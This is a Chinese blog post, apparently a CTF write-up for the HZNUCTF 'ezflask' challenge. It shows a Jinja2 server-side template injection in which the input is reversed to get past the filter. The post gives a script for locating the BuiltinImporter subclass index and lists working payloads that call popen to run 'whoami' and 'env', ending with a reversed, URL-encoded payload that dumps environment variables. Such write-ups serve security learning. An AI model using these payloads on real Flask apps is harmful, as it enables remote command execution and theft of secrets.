HZNUCTF-ezflask

最新推荐文章于 2023-08-30 22:44:33 发布
最新推荐文章于 2023-08-30 22:44:33 发布
阅读量541 收藏 1
点赞数
分类专栏: 刷题笔记 文章标签: 经验分享 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44640313/article/details/129805179
版权

最近做到的一道ssti注入题目,复现一下

参考博客:(2条消息) Jinja2模板注入_搬砖没有未来的博客-CSDN博客

HZNUCTF2023初赛 (yuque.com)

打开环境,发现要求上传一个name参数

试一试name=1,发现可以正常回显;name=604,发现传入的值反过来了

 

 

根据题目名猜测这里存在ssti,尝试name=}}2*2{{ ,回显4存在ssti注入,判断是jinja2的模板

这里可以发现他唯一的过滤,是payload要进行倒叙

 

1.使用str,list,tuple,dict中的一种去获取内置类:"".class

2.获取object基类:使用mro获取 "".class.mro这样先查看获取到的数据,确定object类在list中的第几个

 

 

 

 3.获取子类列表,找到ob类之后取调用他的os类:

"".__class__.__base__.__subclasses__()
"".__class__.__bases__[0].__subclasses__()   使用这个
"".__class__.__mro__[1].__subclasses__()

发现其中有<class '_frozen_importlib.BuiltinImporter'>存在,因此我们靠这个类经行命令执行

找到他所在的位置,搞个python脚本

# flask-SSTI之查询subclasses子类位置

with open('2.txt','r') as f:
    file = f.read().split(", ")

for i in range(0,len(file)):
    if file[i] == "<class '_frozen_importlib.BuiltinImporter'>":
        print(i)
        break

 4.找到其位置,发现是在84

5.然后进行命令执行,最后发现flag是在env中的

{{"".__class__.__bases__[0].__subclasses__()[num].__init__.__globals__['popen']('whoami').read()}}
{{"".__class__.__bases__[0].__subclasses__()[num].__init__.__globals__.__import__('os').popen('whoami').read()}}
num的具体数值根据shell类在subclasses中index确定(注意index是从0开启计数)

我们使用这句payload:【注意在BP中使用符号要url编码后再传】

{{''.__class__.__bases__[0].__subclasses__()[84]["load_module"]("os")["popen"]("env").read()}}             转化后:

?name=%7D%7D)(daer.)%22vne%22(%5D%22nepop%22%5B)%22so%22(%5D%22eludom_daol%22%5B%5D48%5B)(__sessalcbus__.%5D0%5B__sesab__.__ssalc__.''%7B%7B

 

0e1G7
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
EZ-Login:Flask最简单的登录系统
03-08
EZ登录 要求 您只需要安装Python和Flask。 要获得Flask,您可以通过pip install Flask或进行pip3 install Flask 。 设置 设置登录系统非常简单。 您实际上无法进行git clone因为您只需要克隆一个文件夹即可。 复制并粘贴并将其放入名为Login.py的文件中。 接下来创建一个名为Users.json全新JSON文件。 确保它与Login.py在同一目录中,并确保其中没有数据。 空白表示: {} 。
Flask框架基础入门教程
其实我是C先生--的博客
07-08 6893
文章目录前言Flask 基础概念和安装Flask 快速入门小应用Flask 之模板的使用后续,待更新。。。。 前言 最近开始学习flask 框架,本文用于flask 框架的基础入门学习,版本使用的是py3.7,学习内容相对比较简单,后续再扩充高级知识。 Flask 基础概念和安装 首先我们得清楚,flask 具体是个什么东东?我们学了flask 有啥用? 这里给出维基百科的解释:Flask是一个使...
SSTI Flask做题记录1
Firebasky的博客
10-12 985
这个知识点是前几天从接触的,是因为创建HDCTF的比赛遇到的于是自己就来记录一下和学习一下 1. ezflask hdctfezflask地址 这个题比较简单,直接一层一层的去找一找利用的类和函数就可以啦 记录一下自己的步骤: 1.{{''.__class__}} # 获得单引号的类型 2.{{''.__class__.__base__}} #获得object 3.{{''.__class__.__base__.__subclasses__()}}#获得基类 4.{{''.__class__.__.
DASCTF 2023 & 0X401七月暑期挑战赛 web题 EzFlask
最新发布
m0_63138919的博客
08-30 218
1
ctfshow_愚人杯WEB之easy_flask
XiaoXiao_RenHe的专栏
04-20 875
ctfshow愚人杯WEB之easy_flask重现步骤,cookie内容调整方法。
DASCTF 2023 & 0X401七月暑期挑战赛 Web方向 EzFlask ez_cms MyPicDisk 详细题解wp
Jay17的博客
08-05 1227
DASCTF 2023 & 0X401七月暑期挑战赛 Web方向 EzFlask ez_cms MyPicDisk 详细题解wp
buuctf--easyflask
qq_46263951的博客
01-04 857
根据提示访问/file?file=index.js,可以看到提示源码在/app/source #!/usr/bin/python3.6 import os import pickle from base64 import b64decode from flask import Flask, request, render_template, session app = Flask(__name__) app.config["SECRET_KEY"] = "*******" User = type
HZNUCTF2023 web
weixin_63231007的博客
05-07 1288
HZNUCTF校赛 赛后复现
HSCSEC 2023 个人练习
weixin_44770698的博客
02-19 700
HSCSEC 2023 练习
GACTF2020 simpleflask& EZFLASK
汗的博客
09-03 1353
信息收集 直接访问,提示方法不允许 使用burpsuite,右键-change request method 提示了个name,猜测是参数 因为题目是flask,容易想到ssti,直接试name={{2*2}} 再试,因为可能是有过滤、waf之类的name={{2-2}},可以看到2-2有了结果 可以确定是存在ssti的,接下来就是具体的bypass和get flag了 bypass&利用 用burp进行一次fuzz,还做不到颅内ctf,以下是一个简单的fuzz字符list [ ] ( \
2020巅峰极客Web题---Easy Flask
李熠专用博客_白帽子一枚,人称低危终结者
09-28 1638
看标题,猜测改网站用的事Flask框架,搜索引擎一搜,发现Flask存在模板注入漏洞: 于是大概可以推测,题目应该考察的是模板注入漏洞。 打开题目网址,有个登录页面,输入用户名,进入下面的页面: ...
HZNUCTF2023初赛
Emmaaaaa's blog
03-27 951
cpdd:摩斯密码 classical:base + 凯撒 child_OTP:异或 child_quadratic_residue:直接开根法 child_proof_work:暴力破解uuid4{8位 - 4位 - 4位 - 12位} chile_steam:异或 child_RSA:基础RSA解密 RSA1:维纳攻击 很简单的数学1:离散对数(discrete_log) child_gcd:费马小定理 (a ** (p-1) = 1 mod p) RSA3:模运算法则,离散对数
[HFCTF 2021 Final]easyflask
Sk1y的博客
01-24 4509
[HFCTF 2021 Final]easyflask 知识点:pickle反序列化,session伪造 文章目录[HFCTF 2021 Final]easyflaskpickle学习关于pvm和jvm的解释python反序列化实例分析获取源码解题步骤读取secret_key反序列化脚本伪造session参考链接 pickle学习 import pickle data = ['aa','bb','cc'] #dumps 将数据通过特殊的形式转换为只有python语言认识的字符串 p = pickle.du
HZNUCTF2023部分wp-Reverse
m0_73393932的博客
04-04 650
逆向
[HZNUCTF 2023 preliminary] 2023杭师大校赛(初赛) web方向题解wp 全
Jay17的博客
08-16 1141
[HZNUCTF 2023 preliminary] 2023杭师大校赛(初赛) web方向题解wp 全
DASCTF 2023 & 0X401七月暑期挑战赛web复现
weixin_63231007的博客
08-02 1024
python原型链污染&xpath注入&pearcmd文件包含&django框架
Flask(四)
qq_60381063的博客
09-11 242
2,session:session和cookie的作用有点类似,都是为了存储用户相关的信息,不同的是,cookie是存储在本地浏览器,session是一个思路、一个概念、一个服务器存储授权信息的解决方案,不同的服务器,不同的框架,不同的语言有不同的实现,虽然实现不同,但是他们的目的都是服务器为了方便存储数据的,session的出现,是为了解决cookie存储数据不安全的问题。wtforms表单的两个主要功能是验证用户提交数据的合法性以及渲染模板,当然还包括一些其他功能:CSRF保护、文件上传等。
NUAACTF - Web - Ez_Flask
1tachi的博客
12-27 583
按照提示随便传一个:?name=123 可能存在模板渲染,检测一下:?name=${2*7} ?name={{7*7}} ?name={{7*'7'}} 发现是 jinja2 渲染 看一下所有的类:?name={{[].__class__.__base__.__subclasses__()}} 可以一点一点的往下找,也可以直接写payload {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ ==.
【CTF】Python原型链污染
Luminous_song的博客
08-05 737
在Python中每个对象都有一个原型,原型上定义了对象可以访问的属性和方法。当对象访问属性或方法时,会先在自身查找,如果找不到就会去原型链上的上级对象中查找,原型链污染攻击的思路是通过修改对象原型链中的属性,使得程序在访问属性或方法时得到不符合预期的结果。
近期CTF web
qq_61768489的博客
04-08 1243
NKCTF2023 ctfshow愚人赛 杭师大CTF

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值